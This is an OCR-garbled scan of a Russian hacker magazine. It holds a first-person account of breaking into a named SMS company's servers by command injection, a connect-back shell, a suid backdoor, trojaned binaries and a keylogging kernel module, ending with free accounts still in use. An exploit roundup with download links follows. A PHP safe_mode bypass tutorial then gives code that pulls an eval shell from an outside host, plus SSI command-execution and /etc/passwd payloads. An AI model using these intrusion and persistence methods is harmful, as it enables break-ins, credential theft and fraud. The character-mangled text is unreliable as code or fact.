ЛАГАЛ, ЧТО НЕЗАТЕЙЛИВАЯ УБОРКА МОЖЕТ ПРИВЕС- 
ТИ К СОКРУШИТЕЛЬНОМУ ВЗЛОМУ ИЗВЕСТНОЙ КОР- 
ПОРАТИВНОЙ СЕТИ I Мазіег-іате-тазіег 



Всегда проверяй 
различные конфиги в 
каталоге /еіс. В них часто 
хранятся пароли, ключи и 
другие интересные вещи. 

одного изъяна — код был проду- 
ман до мелочей. Но при просмот- 
ре очередного скрипта мои дово- 
ды быстро рассеялись. Мне посча- 
стливилось обнаружить кусок ко- 
да следующего содержания: 

[кусок бажной программы] 

<? 

$аіЛІі = пеѵѵ зіІеАіШі(); 

$аиШ->сбескАиШ($Іодіп); 

$изег_по = $аиИі->деШзегІ\Іо(); 

$стб = Ѵизг/сІіскаІеІІ/сотріІе -ѵ'; 
і! (іззеІ($оІа_Іуре)&&$оІа_Іуре!=-1) $стсі .= " -і$оіа_Іуре"; 
іі (іззеІ($пате) && $пате != "" &&$о1а_1уре == 1) $рогІ != -1) $стс] .= 
" -С$роД"; 

і! (І5зе1($ізр_пате) && $ізр_пате != "") $стсІ .= " -І$ізр_пате"; 
і! (І55е1($5т5_5тзс) && $зт5_5тзс != "") $стсІ .= " -а$5т5_5тзс"; 
і! (І55е1($дрг5_ассе55) && $дргз_ассезз != "") $стсІ .= " - 
6$дрг5_ассез5 п ; 

$оІа_геІ = ехес($стсІ); 

?> 

Даже непосвященный в РНР человек скажет, что код содержит большой 
изъян. Действительно, внешняя переменная $стб вполне может содер- 
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Не стоит забывать, что все 
действия хакера противо- 
законны, поэтому данная 
статья дана лишь для озна- 
комления и организации 
правильной защиты с тво- 
ей стороны. За применение 
материала в незаконных 
целях, автор и редакция 
ответственности не несут. 
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кусок кода бажного сценария 
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фатальная ошибка в риЫіс-зоне 



жать специальные символы, с помощью которых можно легко произвес- 
ти атаку. Мне оставалось лишь найти этот сценарий в риЫіс-зоне он- 
лайн-системы СІіскаІеІІ. Зная название скрипта и примерную структуру 
компании, я быстро решил проблему. Подставив в поток нестандартное 
значение переменной $о1а_іуре, я получил то, что и ожидал — резуль- 
тат выполнения команды ипате -а. 

[устраиваем притон на сервере] Далее все протекало по станда- 
ртному сценарию: я залил соппЬаск-шелл и зацепился на порт 4444. 
В консоли не было никого кроме меня, у американцев уже закончился 
рабочий день. Но взломать ѴѴѴѴѴѴ-сервер было непросто — на машине 
стояло крепкое ядрышко из семейства 2.4, а также вертелась парочка 
незатейливых ЮЗ. Чтобы порутать такой сервер, нужно было приложить 
немало усилий, что я и намеревался сделать. 

Несмотря на всякие сложности, я горел желанием получить рута на этой 
операционке. Для этого, как обычно, я начал просматривать все катало- 
ги на предмет нестандартных файлов, но большинство из них не чита- 
лись с моими привилегиями. Но через полчаса удача мне улыбнулась: 
бороздя просторы папки /еіс, я заметил, что конфиг сгопІаЬ.ГюигІу, ѵѵеек- 
Іу, баііу и топІГіІу вполне доступны для чтения! Это было немного стран- 
но, так как почти во всех системах, с которыми я имел дело, данные 
файлы не читались под правами поЬобу. Возможно, администратор 
просто перенес эти документы с другой машины, поэтому права на них 
выглядели нестандартно. Просмотрев все конфиги кронтаба, я получил 
массу дополнительной информации, которая помогла мне добиться ус- 
пеха. Как оказалось, каждую неделю в воскресение, происходил бэкап 
всех данных на внешний носитель. После некоторой проверки оказа- 
лось, что дополнительный диск моунтится в точку /изг/іосаі/сііскаіеіі/сіаіа, 
а все бэкапы содержатся в папке /Ьаскир. Зайдя в каталог сіаіа, я попы- 
тался прочитать директорию /Ьаскир, однако этого сделать не удалось 



— с папки был удален атрибут «выполнения». Но, зная премудрости 
системы ІІпіх, мне удалось без труда вытащить нужный архив. Дело в 
том, что в файле сгопІаЬ.ѵѵеекІу явным образом указывалось имя архи- 
ва (Ноте,еІс,ѵѵѵѵѵѵ-[ба 1 е]. 1 аг.д 2 ), поэтому обращение к архиву с запросом 
копирования в другой каталог увенчалось успехом. 

Далее я приступил к распаковке архивов. Начал с НотеЛаг.дг. Внутри 
находилось несколько домашних каталогов, но зайти в них мне не 
удалось — атрибуты, которые налагались на файлы, автоматически 
применились к распакованным данным. В голову пришла резонная 
идея: закинуть все бэкапы на ѴѴѴѴѴѴ, а затем сливать их со сторонней 
машины. Но при попытке скопировать увесистый архив, система вы- 
ругалась на превышение доступного дискового пространства. Чтобы 
не утруждать себя в пересоздании архива, я занялся небольшим по 
размеру архивом ѵѵѵѵѵѵДаг.д т, где, по-видимому, располагались ѵѵеЬ- 
сценарии, шаблоны и прочая ерунда. Сперва я подумал, что этот ар- 
хив аналогичен тому, который я слил полгода назад, однако ошибал- 
ся. Внутри располагалось порядка десяти папок с различными конфи- 
гами, скриптами и картинками. И тут мне пришла в голову хорошая 
мысль — проверить рГір-инклуды на предмет паролей и другой конфи- 
денциальной информации. Проверка показала, что в двух конфигах 
располагалась приватная инфа для подключения к БД. Причем, кон- 
нект происходил, как это обычно бывает, под рутовой учетной за- 
писью. Осталось проверить совпадает ли рутовый пароль для Му50І_ 
с системным. Для этого, по традиции я использовал утилиту ИуХ 
(принцип ее работы я уже описывал в одном из «этюдов»). Запустив 
демон, я приконнектился клиентом, и получил эмулятор псевдотерми- 
нала. Затем осуществил суид на суперпользователя и... был наделен 
всеми возможными правами :). Признаться, я не ожидал, что админи- 
стратор установит один и тот же пароль на разные сервисы, хотя дан- 
ное явление очень распространено среди всех админов. 



НЕКРОЛОГ СІ_ІСКАТЕІ_І_ 

Компания СІоскаІеІІ (ѵѵѵѵѵѵ. сііскаіеіі. сот) предлагает услу- 
гу рассылки ЗМЗ-сообщений через шлюзы в сети Іпіегпеі 
практически по всем сотовым операторам. Уникальность 
этой услуги в том, что отправитель может подставить лю- 
бой номер (или имя) в поле Зепбег Ю. Таким образом, 
можно ввести в заблуждение многих людей, послав чело- 
веку ЗМЗ от подложного отправителя. О подобных прико- 
лах уже писали в этом журнале (05/2004). Кстати, СІіскаІеІІ 
предоставляет и другие услуги, ознакомиться со списком 
ты можешь на сайте компании. 
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ЧТО ПОМОГЛО МНЕ ПРИ ВЗЛОМЕ? 

И Поиск дополнительной информации, анализ конфигов и ка- 
талогов помог получить права гооі в практически неуязвимой 
системе. 

Ш Сборка модуля на сторонней машине с подобной конфигу- 
рацией здорово помогла мне перехватить пароль суперпользо- 
вателя. 

[з] Иногда полезно сохранять бэкапы скриптов у себя на компь- 
ютере. Как видишь, они мне здорово пригодились ;). 



[укрепляемся в системе] Получив рута, я первым делом подумал о бу- 
дущем. Мысль о том, что после создания халявного аккаунта с бесконеч- 
ными ЗМЗ-кредитами, мне прикроют доступ на сервер, никак не радовала. 
Поэтому нужно было каким-то образом забэкдорить систему, либо облег- 
чить механизм получения рутовых прав. Я решил сделать следующее: на- 
писать небольшой зиіб-шелл, дающий рута под правами любого пользова- 
теля, а также замаскировать соппЬаск-бэкдор под функциональный сис- 
темный бинарник. Учитывая то, что на сервере был установлен Ігірѵѵіге, 
мне пришлось удалить два не совсем нужных бинарных файла и заменить 
их на самопальные релизы :). После этого с помощью команды ІоисГі, я ус- 
тановил неприметное время создания файла и на этом успокоился. 

Затем мне в голову пришла еще одна мысль — попробовать добытый ру- 
товый пароль в качестве входа на другие машины. Ах да, я совсем забыл 
сказать, что за машины были в подсети. Кликатель функционировал с по- 
мощью всего трех серверов: два из них были однотипными (ѵѵѵѵѵѵі и шт2), 
они обслуживали пользователей. Но запросы от юзера шли на централь- 
ный сервер, назовем его машиной-брандмауэром. Именно он пересылал 
пользовательские данные на один из двух обслуживающих серверов. 

Так вот, я заюзал полученный рутовый пароль на серверах ѵѵѵѵѵѵ2 и Ііге- 
ѵѵаІІ, однако в обоих случаях в систему войти не удалось. Маловероят- 
но, что администратор установил запрет на вход под рутовым аккаун- 
том — команда Іазі на первом сервере показывала, что большинство 
входов осуществлялось именно под записью суперпользователя. Мне 
очень хотелось проникнуть на главную машину компании, поэтому я ре- 
шил каким-то образом отловить пароль на этот сервер. 

В этой ситуации у меня была нехилая свобода выбора: либо воспользо- 
ваться снифером, либо протроянить исходники ззГі, или поставить ка- 
кой-нибудь шпионский модуль. Я решил воспользоваться третьим вари- 
антом, потому как первые два могли вызвать нестандартную реакцию 
ЮЗ, располагающихся на машине. 

В качестве модуля использовался небезызвестный проект ѵіоддег от ТНС 
{ѵѵ\А/\А/.ІІіс.огд/боѵѵпІоаб.рІір?1=г&і-ѵІоддег-2.1 .1 Ааг.дх). Я скачал его и попы- 
тался установить, но система отторгла вражеские исходники, мотивировав 




время проходит, баги остаются 




список процессов на ѴѴѴѴѴѴ-сервере 



это неизвестными переменными и прочей ерундой. Честно сказать, я не по- 
нял, почему это произошло, но даже не думал сдаваться. В течение пяти ми- 
нут я отыскал машинку с похожим ядром (2.4.30) и собрал модуль на сторон- 
ней системе. В процессе сборки (с помощью команды ѵіодсігі), был установ- 
лен удобочитаемый режим логирования, путь для сохранения журнала и па- 
роль на немедленную деактивацию модуля-шпиона. После того, как файл 
ѵіоддег.о был создан, я аккуратно перенес его на ѴѴѴѴѴѴ-сервер Кликателя и 
задумался о маскировке. Оценив аптайм сервера (а он равнялся 400 дням), 
я решил не ставить модуль в автозагрузку, так как это только привлечет 
лишнее внимание. Сам модуль я поместил в папку /изг/ІіЬ/кегпеІ/2. 4. 30/тосІ- 
иіез/пеі/пеіѵѵогкіпд.о и немедленно загрузил его с помощью команды іпзтосі. 
Без особых нареканий ядерный плагин был подгружен, а в журнале появи- 
лись первые записи об успешном логировании. Удовлетворившись работой 
шпиона, я подтер лишние логи и временно вышел из системы. 

[полоса неудач] К вечеру мне захотелось проверить работу ѵіоддег'а. 
Попытавшись аккуратно запустить бэкдор, я включил ожидание коннекта на 
порт 4444. Однако соединения не последовало. Как оказалось, администра- 
тор удалил соппЬаск-шелл из каталога /изг/Ып, а также сменил пароль на ру- 
та (об этом я понял позднее). Ничего не оставалось, как залить шелл по но- 
вой и зайти в систему повторно. Поразительно, но мой зиіб-бэкдор остался 
нетронутым и с его помощью я опять получил права администратора :). 

Судя по всему, Ігірѵѵіге при очередной проверке выявила пос- 
торонний бинарник, либо админ запалил меня, анализируя 
логи входа на сервер (вспомни, я рассказывал о том, что по- 
пытался войти под рутовым аккаунтом на другие машины). 
После первых разочарований, я проверил наличие и работос- 
пособность ѵіоддег'а. Поразительно, но модуль также никто не 
заметил, а в логе появились несколько интересных записей: 

раззѵѵсі гооі 

РаззѵѵогсІ із: РАЗЗѴѴ0РЮ 

ззіі ТігеѵѵаІІ -I гооі 
Раззѵѵогсі із: РАЗЗѴѴ0РЮ2 

Таким вот нехитрым образом я получил рутовый пароль на 
главную машину компании. В качестве фаервола использо- 
вался стандартный ірІаЫез в комплекте с дополнением раІсГі- 
о-тайс. С помощью последнего и реализовывались функ- 
ции среднего распределения запросов по ѴѴѴѴѴѴ-серверам. 

[второй удар ниже пояса] Разобравшись в иерархии 
серверов и в правилах файрвола, я решил порадовать се- 
бя и ближних и создать парочку анлимитных аккаунтов. 
Дампы Кликателевской базы располагались у меня на ма- 
шине, поэтому через несколько минут я вспомнил, каким 
образом связываются таблицы Ьаіапсе, изег и регзоп. За- 
тем мной были созданы три аккаунта для Меззепдег РРЮ 
с 10000 кредитами на каждом, которыми я пользуюсь и по 
сей день. А недобрые администраторы до сих пор не могут 
залатать ошибку в публичном скрипте и определить нали- 
чие шпионских модулей уже на трех своих серверах... © 
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Докучаев Дмитрий ака РогЬ (!огЬ@геаІ. хакер. ш) 

ОБЗОР ЭКСПЛОЙТОВ 



ѴѴ2К Р’Ы’Р ВЕМОТЕ ЕХРІ.ОІТ 
[описание] Как это не печально, во всех сер- 
висах рано или поздно находят ошибки. И не- 
важно в какой операционной системе эти 
службы живут. На этот раз баг нашелся в ста- 
рой как мир службе РІид апб РІау. Она исполь- 
зуется при установке нового оборудования, по- 
этому, как правило, включена во всех систе- 
мах. Методом проб и ошибок багоискатели 
нашли брешь в сервисе, которая позволяла пе- 
реполнить стек и выполнить произвольный код 
под аккаунтом І_осаІЗузІет. Эта служба доступ- 
на через именованные каналы (РІРЕ) по 445 
порту, поэтому любой удаленный пользователь 
способен сокрушить ѴѴіпсІоѵѵз 2000. 

Эксплойт написан на языке С и нормально 
компилится как под виндой, так и под ІІпіх. В 
качестве параметров выступает Позі и рогі, на 
котором запускается системный шелл. 



ХООРЗ <=2.0.11 ЗОЫШЕСТЮЫ 
[описание] РНР-движки и модули всегда 
славились своими ошибками. В конце июля об- 
наружилось наличие множественных багов в 
модуле ХМІ_-ВРС (ЗОЕ-инжекции, выполнение 
РНР-кода). Как это обычно бывает, подробнос- 
ти ошибки не сообщались. Спустя неделю вы- 
шел первый эксплойт для какого-то движка, 
использовавшего модуль, и понеслось... Как 
оказалось много форумов используют ХМІ_- 
ВРС, так как это очень удобное средство :). И 
вот не так давно русская хак-группа ВЗТ выпус- 
тила убийственный эксплойт для известного 
форума хоорз. Сплоит позволяет просматри- 
вать хэши паролей администраторов посред- 
ством нехитрой ЗОЬинъекции. 

Запускать эксплойт следует с двумя параметра- 
ми: -и Шр://хоорз . сот/іогит -п изег_пате, где 
изег_пате — зарегистрированный ник пользо- 



ѴѴІЫ ХР ЗР2 'РЮРѴѴО.ЗѴЗ' 

ВЕМОТЕ КЕВЫЕІ_ 003 
[описание] Еще в начале лета я получил уве- 
домление о том, что в протоколе РЮР найдена 
фатальная ошибка. Но за неимением эксплой- 
тов и подробностей, я особо не заморачивался 
этой проблемой. Как оказалось, действитель- 
но, сервис не застрахован от переполнения бу- 
фера, а в идеальном случае злоумышленник 
может выполнить произвольный код. Первый 
выпущенный эксплойт работает, как ЭоЗ’ер, и 
только в системе ѴѴіпХР+ЗР2. В других систе- 
мах либо просто нет уязвимости, либо автор 
эксплойта пока не опубликовывает ее. 

Сплойт написан на языке Зріке. Это скрипто- 
вый язык, применяемый для передачи двоич- 
ных данных по протоколу ТОР. Поэтому преж- 
де чем тестировать эксплойт, установи Зріке 
{Ыір://ѵѵѵѵуѵ.іттипііузес.сот/сіоуѵпІоасіз/ЗРІКЕ2. 









[защита] Как обычно, МісгозоК оперативно 
отреагировала на дырку в службе и поспешила 
защитить своих клиентов. В итоге мы можем 
лицезреть страницу ѵѵѵѵѵѵ.тісгозоН.сот/ІесІі- 
пеі/зесигііу/ВиІІеІіп/М805-039.тзрх с внуши- 
тельным списком патчей для всех ѴѴіпсІоѵѵз- 
Ііке-систем. 

[ссылки] Забирай эксплойт с шт. хакер хи/розУ 
27697/деіаиН.азр. Более подробное техническое 
описание ошибки можно прочитать тут: шш.зеси- 
гііуІаЬхи/ѵиІпегаЫІНу/зоигсе/2120 1 б.ріір. 

[злоключение] В ѴѴІП2003 и ѴѴіпХР програм- 
мисты добавили аутентификацию, поэтому 
внедриться в систему под І\ІІЛ_І_ сессией не 
удастся. Однако выпущенный эксплойт являет- 
ся вполне сносным локальным средством на- 
падения для вышеперечисленных систем :). 

[дгееіз] Автор эксплойта с ником ИоизеоІсІ- 
аЬиз не раз исследовал и практически ломал 
сервисы в ѴѴіпГѵІТ-системах. Надеемся, что его 
эксплойт будет не последним шедевром :). 



вателя. После модификации соокіез можно 
зайти под этим пользователем в админку и вы- 
полнить произвольный код через бажные ад- 
министративные шаблоны. Но это уже совсем 
другая история :). 

[защита] Чтобы защититься от ошибки нужно 
обновить версию РНР. В данный момент обнов- 
ленные релизы можно скачать на ѵѵѵѵѵѵ.ріір.пеі. 

[ссылки] Скачать эксплойт можно по адресу 
Ыір://гзі.ѵоісІхи/сІо\л/пІоасІ/г57хоорз.іхі. На сайте 
гзі.ѵоісіхи ты можешь найти и другие хорошие 
творения от русских ребят. 

[злоключение] Модуль ХМІ_-ВРС использу- 
ется во многих проектах, и, как следствие, уяз- 
вимость поселилась в десятках раскрученных 
продуктах. Пока что эксплойты для них не 
вышли, но надежда умирает последней :). 

[дгееіз] Команда ВЗТ выпустила очень много 
хороших эксплойтов, и все они, как правило, 
нацелены на различные форумы и движки. 



Э.ідх), а затем запусти его с параметром фай- 
ла, в котором расположены коварные последо- 
вательности, например, так: ./депегіс_зепсИср 
192.168.1.100 3389 гетоіеазз.зрк 1 О 
В итоге ты должен получить отказ в обслужи- 
вании и аварийный ребут. 

[защита] Полный комплект патчей от МісгозоК 
ты можешь найти на странице шш.зесигііуІаЬхи/ 
ѵиІпегаЫІііу/205980.рІір . 

[ссылки] Эксплойт находится здесь: \/ѵ\/ѵ\/ѵ. хак- 
ер хи/розУ 2767 2/беІаиІі.азр. Прежде чем испы- 
тывать его на доверенной системе, убедись, 
что хрюшка собрана со вторым сервиспаком. В 
противном случае ничего ломаться не будет :). 

[злоключение] Протокол РЮР призван быть 
лучшим средством управления в ѴѴіпХР. Поэ- 
тому во многих системах порт 3389 будет всег- 
да открыт для непрошенных гостей. Если пред- 
положить, что следующий релиз будет выпол- 
нять любые команды под аккаунтом Зузіет, то 
данная брешь будет ничуть не хуже какой-ни- 



будь ВРС-ЭСОМ или І_зазз-дырки. 



[дгееіз] Эксплойт запатентован на имя Тот Реггіз 
(іотту@зесигіІу-ргоіосоІз.сот). Пожелаем Тому вы- 
пустить второй релиз, способный выполнять код на 
произвольной системе (и не только в ѴѴіпХР+ЗР2). 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕПРШМ НЬЮСЫ 




Поднимаем 
железный занавес 

ВСЕ СТАНДАРТНЫЕ СХЕМЫ ПРОНИКНОВЕНИЯ НА 
НЕПРИЯТЕЛЬСКИЕ САЙТЫ УЖЕ ДАВНО ИЗВЕСТНЫ. 
ЯДОВИТЫЙ НОЛЬ, РНР-ІЫСІ-ІЮЕ, ЗОЫШЕСТІОЫ — 
ИМИ НЕ УДИВИШЬ ДАЖЕ ПОСТОЯННЫХ ПОСЕТИТЕ- 
ЛЕЙ ДЕТСКОГО САДА. ПОЛУЧИВ НА УДАЛЕННОМ СЕР- 
ВЕРЕ ВОЗМОЖНОСТЬ ВЫПОЛНЯТЬ КОМАНДЫ, 
ВЗЛОМЩИКИ СПЕШАТ ЗАЛИТЬ УДОБНЫЙ РНР-ШЕЛЛ, 
КОТОРЫХ СЕЙЧАС РАЗВЕЛОСЬ ОГРОМНОЕ МНОЖЕ- 
СТВО — ОДИН КРАСИВЕЕ И ЯРЧЕ ДРУГОГО. НЕ СПО- 
РЮ, ИСПОЛЬЗОВАНИЕ ѴѴЕВ-ОБОЛОЧЕК УПРОЩАЕТ 
ДАЛЬНЕЙШЕЕ ПРОДВИЖЕНИЕ. НО ИНОГДА СЛУЧАЕТ- 
СЯ ДОВОЛЬНО ПЕЧАЛЬНОЕ ЯВЛЕНИЕ, КОГДА 
РНР_ЗНЕ1_І_ НЕ ВЫПОЛНЯЕТ КОМАНДЫ, ИНКЛУДИТЬ 
ФАЙЛЫ НА СЕРВЕРЕ НЕ ПОЛУЧАЕТСЯ, И ВОЗНИКАЕТ 
МОРЕ ОШИБОК. ЭТО И ЕСТЬ ОН — УЖАСНЫЙ 
РНР_ЗАРЕ_МСЮЕ. МНОГИЕ В ТАКИХ СЛУЧАЯХ ПРОС- 
ТО ОПУСКАЮТ РУКИ, ССЫЛАЯСЬ НА ПЛОХУЮ ПОГО- 
ДУ В ЯПОНИИ, НО МЫСЛЬ ХАКЕРОВ НЕ СТОИТ НА 
МЕСТЕ. ОНИ НАУЧИЛИСЬ ОБХОДИТЬ БЕЗОПАСНЫЙ 

РЕЖИМ В РНР I Александр Любимов ака ЗазЫкз ( геаІ_ззІпх@таіІ.ги ) 



* ореп_ЬазесІіг=/имя/директории. Довольно подлая директива :). Если 
твой скрипт пытается прочесть файл вне указанной директории (напри- 
мер, с помощью Іореп() или ІіІе()), то появляется ошибка, вроде 
ореп_ЬазесІіг гезігісііоп іп еііесі. Хотя можно попытаться прочесть файл 
на каталог выше — возможно, из этой затеи что-то выйдет. 

* за!е_тобе_ехес_біг=/имя/директории. Скрипт напрочь отказывается 
выполнять системные программы, которые находятся за пределами 
этой папки. Следовательно, если сценарий лежит в /изг/іюте/сіеер/азз, 
то выполнить зузІет(/Ьіп/Із) не будет никакой возможности. 

* бізаЫе_ІипсІіопз="имя функции". Это очень жесткая директива, ко- 
торая позволяет администратору отключить определенные функции. 
Как ты догадался, обычно в черный список попадают потенциально 
опасные зузІет(), ехес(), раззбіги() и рореп(). Хотя есть маленькая 
хитрость, которая все-таки позволяет исполнять команды в операци- 
онке, но это мы еще обсудим чуть ниже. Следует отметить, что біз- 
аЫе_ІипсІіопз решила проблему, которую не дорешала предыдущая 
директива: взломщик теперь напрочь лишен возможности выполнять 
системные команды. Как ты понимаешь, ѵѵеЬ-шелл в таких условиях 
функционировать не будет и выполнять команды привычным зуз- 
Іет($_ѲЕТ['стсІ І ) не получится. 

Вот основные проблемы, с которыми тебе придется встретиться при ра- 
боте с машинкой, где РНР крутится в защищенном режиме. Чтобы полу- 
чить больше информации о директивах и настройках РНР, тебе следует 
обратиться к официальной документации, интересные выдержки из ко- 
торой ты найдешь на нашем диске, а целиком ее почитать тебе удастся 
на сайте ѵѵѵѵѵѵ.ріір.пеі. 




Методы обхода 
ограничений РНР за^е тобе 

[курс молодого бойца] Итак, во-первых, что же такое РНР ЗАРЕ 
МСЮЕ? Как написано в мануале — это «попытка решить проблему бе- 
зопасности». Говоря же простым языком, это указание некоторых важ- 
ных директив рПр интерпретатора в файле настроек, которые должны 
помешать взломщику проникнуть в систему, либо отпугнуть его. Таких 
директив довольно много. Давай ознакомимся с некоторыми из них: 

* за{е_тобе_діб=1 10. Строка включает сравнение дісі'ов владельца файла и вла- 
дельца выполняемого скрипта, и, в случае несовпадения, запрещает доступ 
скрипта к файлу. Например, если ты попробуешь прочитать файл паролей геаб- 
ІіІеС/еІс/раззѵѵб 1 ), а он принадлежит ругу, то увидишь сообщение об ошибке. 



А мы тем временем попробуем научиться обходить хотя бы часть из 
этих строгих ограничений. Конечно, на примере реального хостинга. 

[незаменимая практика] Для своих тестов я выбрал не просто обыч- 
ного ІЗР, а хостинговый сервер одной из самых уважаемых и известных ук- 
раинских компаний с большим количеством серверов и мощной службой 
поддержки. Поэтому все, что я опишу далее, справедливо для большей час- 
ти остальных хостеров. Так же следует отметить, что эксперименты я про- 
водил и на зарубежных хостингах, и все описанные в этой статье приемы 
успешно функционировали и там. Но не буду забегать вперед. 

Вообще, вся эта история началась пару месяцев назад, когда мне захо- 
телось надломить сервер как раз этой украинской хостинговой компа- 
нии, о которой пойдет речь ниже. После недолгих поисков бажных рПр- 
сценариев, я наткнулся на банальный непропатченный и всеми люби- 




мый рПрВВ 2.0.1 1 . Закачав и запустив сплоит (Шр://ипіхіогде.огд/~ззІіх/х/ 
ркірЬЬ.ехе), который, по идее, дает право выполнять произвольный рПр- 
код на целевой системе, я получил в ответ следующее: 

Ийр://Іакіп.ІагІер.пеѴІошт/асІтіп/асітіп_5ІуІе5.р[ір?тосіе=асісіпе\А/&іпзІаІН 
о=../../../../../../../../../../../../../../../../../../..Лтр&підда=рІіріпІо();& 
8ісІ=5сІ9732ае67есІЗЬ6657Тс909с1 0е5Т4Ь4 

Однако, было одно но. Вместо ожидаемого вывода рИріпІо() вывелась 
ошибка: ѴѴагпіпд: рИріпТо() Паз Ьееп сІізаЫесІ Тог зесигйу геазопз. Как вы- 
яснилось чуточку позже, системные функции выполнять было тоже нель- 
зя, и ситуация была довольно неприятная, что говорить. Однако именно 
она заставила меня искать замену стандартным способам общения сер- 
вера через зузІет(). Итак, давай выясним что мы имеем: системные ко- 
манды выполнять мы не можем, следовательно, и исследовать файло- 
вую систему нельзя, заливать файлы и просматривать содержимое тоже. 
Но мы все еще можем выполнять код в функции еѵаІ(), которая интерпре- 
тирует рПр-код, то есть теперь нам нужно все необходимые функции для 
общения с сервером написать самому и передавать их на выполнение в 
еѵаІ(). В первую очередь необходимо записать на удаленную машину 
ѵѵеЬ-форму еѵаі шелла, чтобы ему отдавать на обработку наш рНр-код. 
Для этого в переменную підда передаем следующий сценарий: 

[запись файла] 

<?ріір 

$ІіІеп="Іійр://ипіхІогде.огд/~55Іі)(/)(/еѵаІ_5[іеІІ.р[ір.М"; 

$ІМе_пе\л/="еѵаІ_5ІпеІІ.рИр"; 

$сІаІа = ітрІосіе("", ТМе($ТМеп)); 

$Ір = Тореп($ТМе_пе\л/, V); 

ІриІз($Ір, $с!а1а); 

ТсІозе($Тр); 

?> 

Думаю, в особых комментариях код не нуждается. Получаем хэндл фай- 
ла для записи, а в $ІіІе_пеѵѵ пишем содержимое нашего файла. Замечу, 
что можно записывать как файлы с локальной машины, так и удаленно, 
если для Іореп() не блокируется открытие сокетов. 

Теперь в текущую папку будет записана ѵѵеЬ-форма, через которую мы 
в дальнейшем будем выполнять произвольный код. Собственно, некое 
подобие рПр-зІпеІГа у нас есть, но от нормального шелла он будет отли- 
чаться тем, что мы будем использовать свои функции для навигации по 
ФС и работы с файлами, что немного неудобно и сначала непривычно. 



Настало время заняться написанием /А 


На нашем диске ты най- 


скриптов. Вот что нам нужно в пер- Н№ 


ШЙ дешь полные версии прог- 


вую очередь: 


рамм, описанных 


ЦО Навигация по серверной фай- 
ловой системе 


в этой статье. 

В РНР версии 4.3.x присут- 


\2\ Чтение файлов 


ЩЛ ствует баг, который даже 


[з] Запись/загрузка файлов 


^ при включенной 


Для начала, пожалуй, хватит. Пое- 


ореп_Ьазебіг и других ди- 
рективах позволял подк- 


хали. Самым легким скриптом из 


лючать любые доступные 


нашей коллекции будет примитив- 


на чтение файлы: іпсіибе 


ная читалка файлов: 


("/гоо1/.Ьазб_Шог/) 


<?рІір А 


^ Есть маленькая хитрость, 


есііо пІ2Ьг(ііІтІзресіаІсІіаг5(ітрІосІе (щ 


НП которая все-таки позволя- 


(", ІіІе('ІіІепате'))); 'Щ 


Щг ет исполнять команды в 


?> 


операционке — это опера- 


Здесь Іііепате, как и следовало 


тор обратные кавычки С ') ■ 
Используем его так: 


бы ожидать, — имя читаемого 


<?рбр 


файла. Кстати, хочу сказать, что 


оиіриі = 75 -аГ; 


одни и те же задачи можно ре- 


есііо "<рге>$оиіриі</рге>" 


шать разными способами. Никто 


?> 


не мешает тебе открывать файл 
функциями Іпс1ис1е(), гециіге(), (І1е(), /Ж 


Подробный ман по рйр - 


а читать из стандартного Іореп()- 


ЩЦ всегда держи под рукой: 


хэндла при помощи ІгеасІ(), Іде1з() ^ 


шшш.рйр.пеі/бошпіоаб- 


или Іде1с(). Таким образом, даже ес- 


босз.ріір 


ли одна из этих функций окажется 


Очень хороший справоч- 



в черном списке запрещенных вы- 
зовов, скорее всего, найдется ра- 
ботающий аналог. Так что если ка- 
кая-то функция не работает, сле- 
дует обратиться к документации и 
пройтись по всему списку зее аізо. 

Теперь, чтобы прочитать, например, 
фаілп/еіс/Нозіз, топаем на шшНакіп. 

іагІер.пеі/раШо/еѵаІ_зНеІІ.рНр и вставляем в форму наш код, но без рПр-тэ- 
гов (<? и ?>), содержание файла должно успешно отобразиться. Попут- 
но можно узнать операционку, которая крутится на сервере — для этого 
есть специальная функция рИр_ипате. Ты все правильно понял, можно 
будет быстренько узнать , что там стоит *В30 и без раздумий отказать от 



ник по всем документиро- 
ванным функциям рбр: 

/? и/и/и/. жб-баск.ш/Ьоокз/ 
Ьоокв.рІір?до=29 
Безопасное программирова- 
ние на РНР: шт/жЬ-йаск.ш/ 
Ьоокз/Ьоокз.рйр ?до=36 
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попыток дальнейшего взлома :). Самое время позаботиться о возмож- 
ности шариться по диску. Скрипт довольно примитивен: 

[чтение каталогов] 

<?рИр 

$сНге="Ліоте";//каталог для чтения 
$оЬ=орепсНг("$сМге");//открываем каталог и получаем хэндл 
\л/ИіІе($ТіІеп=геасІсІіг($оЬ)){//читаем содержимое диры 
$Шге2=геаІра1Іі("$сІіге"); 

і! ( із_сІіг("$сІіге2/$ТіІеп") == ТРШЕ ){$сі="[Оіг]";} еізе {$сІ= ЫІІИ;} 
ргіпі "$сі $ТМеп <ЬгхЬг> }//печатаем содержимое 
сІозесііг($оЬ); 

?> 

Только что мы создали замену /Ып/Із, хотя и кривоватую. Сюда можно 
привинтить много других возможностей — например, показ последней 
даты обращения к файлу: 

сІаІе("Р сі У Н:і:5.", ІИетІіте("$Шге/$ІИеп")) 
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Я не мог не упомянуть про 551 (Зегѵег Зісіе Іпсіисіез). Это ди- 
рективы в файлах формата .зітіті и .зітіт, которые выполня- 
ются самим ѵѵеЬ-сервером АрасПе, без каких либо сторонних 
интерпретаторов. С помощью 331 можно творить довольно ин- 
тересные вещи, начиная от инклудинга файлов и заканчивая 
исполнением системных команд. Итак, 331 прописывается 
прямо в тело ѵѵеЬ-странички (как, например, РНР-код) в виде 
<!--#директива= м значение м -->. Естественно, при заходе на сайт 
ты видишь не и а результат выполнения. Например, 
<І--#іпІсисІе= ІІ гідІі1:_тепи.ИітГ І --> включит в ІпІтІ-код страницы 
указанную тобой менюшку. Но 331 можно юзать в своих ко- 
варных целях. Так, например, <!— #іпсІисІе ІіІе= І 7еіс/раззѵѵсІ ІІ --> 
включит в тело страницы содержание системного файла с 
учетными записями (это работает не всегда, и если файл не 
инклудится, то это совсем не значит, что 331-поддержка отк- 
лючена). Самым вкусным является тот факт, что мы можем 
исполнять системные команды от имени веб-сервера: <!-- 
#ехес стек" ітате -а; ісГ--> выведет нам до боли знакомые 
результаты :). Аналогично инклудинг и команды выполняются 
в винде: <!--#іпсІисІе ^іІе="с:\асІтіп5\ра55ѵѵсІ.М ІІ --> и <!--#ехес 
стсІ= ІІ С:\ѴѴіпсІоѵѵ5\зузіет32\стсІ.ехеІсііг С:\"->. В общем, как 
видишь, использовать 331 в своих коварных целях не так уж 
